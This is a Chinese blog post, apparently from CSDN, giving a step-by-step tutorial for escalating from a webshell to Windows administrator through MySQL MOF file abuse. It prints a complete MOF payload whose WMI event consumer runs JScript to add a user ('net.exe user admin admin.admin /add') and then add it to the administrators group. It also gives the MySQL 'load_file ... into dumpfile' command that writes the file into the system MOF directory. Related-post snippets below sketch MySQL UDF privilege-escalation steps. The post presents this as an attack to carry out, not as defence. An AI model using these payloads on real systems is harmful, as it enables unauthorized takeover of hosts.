linux mysql mof提权,mysql提权之mof提权

最新推荐文章于 2022-12-16 16:12:00 发布
最新推荐文章于 2022-12-16 16:12:00 发布
阅读量253 收藏
点赞数
文章标签: linux mysql mof提权

拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权

首先介绍mof提权,直接案例演示

找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof 代码如下

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter

{

EventNamespace = "Root\\Cimv2";

Name = "filtP2";

Query = "Select * From __InstanceModificationEvent "

"Where TargetInstance Isa \"Win32_LocalTime\" "

"And TargetInstance.Second = 5";

QueryLanguage = "WQL";

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name = "consPCSV2";

ScriptingEngine = "JScript";

ScriptText =

"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin.admin /add\")";

};

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};

其中的添加用户命令,上传前请自己更改。(不改默认就添加admin)

8b7e8066cd18

1.jpg

执行load_file及into dumpfile把文件导出到正确的位置

select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

8b7e8066cd18

2.jpg

执行成功,查看用户(我添加的waitalone)

net user

8b7e8066cd18

3.jpg

已经成功添加用户,但此时还是普通用户,并没有添加到管理员

8b7e8066cd18

4.jpg

接下来把语句改一下改成添加为管理组,重复上次的步骤

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter

{

EventNamespace = "Root\\Cimv2";

Name = "filtP2";

Query = "Select * From __InstanceModificationEvent "

"Where TargetInstance Isa \"Win32_LocalTime\" "

"And TargetInstance.Second = 5";

QueryLanguage = "WQL";

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name = "consPCSV2";

ScriptingEngine = "JScript";

ScriptText =

"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe localgroup administrators admin /add\")";

};

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};

8b7e8066cd18

5.jpg

此时已经是管理组了,远程桌面连接

mstsc /admin

weixin_39629631
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql方式linux_Linux的几种常用方式
weixin_32631729的博客
01-28 1912
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,限是非常关键的一步,攻击者往往可以通过利用内核漏洞/限配置不当/root限运行的服务等方式寻找突破点,来达到限的目的。1、内核漏洞起内核漏洞就不得不到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低限用户可以利用该漏洞实现本地,...
mysql总结(自学),面试题解析已整理成文档
最新发布
2401_83946070的博客
04-18 693
检测数据库的存在(探测端口)获取到数据库的限密码查看数据库的类型分类读取网站的配置文件读取数据库备份文件下的库中的表的信息,例如MySQL数据库在mysql_user表中存储账户密码,使用cmd5-mysql5解码暴力破解账户密码,需要支持外联(mysql默认不支持)。可以使用密码脚本在本地爆破,也可以使用工具如msf的scanner mysql_login模块MySQL数据库方式主要有三种使用sqlmap的–os-shell。
Linux mysql root
系统运维
12-30 207
*Usage: *$id *uid=500(raptor)gid=500(raptor)groups=500(raptor) *$gcc-g-craptor_udf.c *$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc *$mysql-uroot-p *Enterpassword: *[.....
mysql root linux,Linux mysql root
weixin_27228507的博客
05-05 160
*Usage:*$id*uid=500(raptor)gid=500(raptor)groups=500(raptor)*$gcc-g-craptor_udf.c*$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc*$mysql-uroot-p*Enterpa...
Linux利用UDF库实现Mysql
12-15
环境: os:linux(bt5)   database:mysql   简述: 通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。   要求:  在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;   过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令 1,得到插件库路径 mysql> show variables like "%plugin%"; +---------------+-----------------------+ |
mof文件nullevt.mof
03-12
其就是用又了mysql的root限了以后,然后使用root限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp....
Mysql UDF、MOF、反链端口.zip
12-14
Mysql UDF、MOF、反链端口
基于MOF的企业架构模型仓库
03-02
本文内容包括:解决方案概述上下文环境解决方案架构基于MOF的EA模型语言(EAML)模型转换结论引用注释参考资料来自RationalEdge:本文介绍了Unisys公司所完成的为美国联邦政府大规模组织构建核心企业架构(EA)的...
mysql(linux)远程数据库漏洞_MySQLLinux)远程数据库漏洞
weixin_36050664的博客
02-07 252
小编的话:Kingcope神牛又放干货了。漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。use DBI();$|=1;=for commentMySQL privilege elevation ExploitThis expl...
mysql的root限下
02-28
mysql的root限下
mysql用户root
11-13
mysql用户rootmysql用户root
暗月mysql全版本通杀
06-21
暗月mysql全版本通杀
Linux MySQL Udf
Coisini的博客
06-12 2173
前几天做一个小竞赛中有一个题目:给定的测试环境登录页面有POST注入漏洞,于是果断操起sqlmap跑数 据,无意中发现当前MySQL连接用户为root,于是想到udf「虽然Windows下MySQL基本上没问题,但是Linux环境下原来一直 没成功过。」,最终成功获取root限「主要问题在于MySQL是以root限运行」,记录笔记如下,方便以后查阅: 具体步骤如下 找到MySQL插件...
Mysql数据库——MOF
cxrpty的博客
03-11 691
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡,应用在win2008以下的系统,Mysql5.7以下(--secure_file_prive:此配置写文件不限制) 实验环境:windows2003 实验步骤: 一、搭建环境 在windows2003上安装3...
linux mysql udf
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 724
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
Linuxmysql UDF
waxcj的博客
12-16 2032
linux mysql数据库
技术干货:MySQL数据库RootMOF方法研究
weixin_34174132的博客
11-01 206
2019独角兽企业重金招聘Python工程师标准>>> ...
mysql mof
05-31
MySQL MOF(Management Object Format)指的是攻击者利用MySQL服务器中的MOF漏洞来执行任意代码,从而实现攻击。MOF是一种用于描述Windows系统管理对象的格式,它可以被用来创建、修改和查询Windows系统对象...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值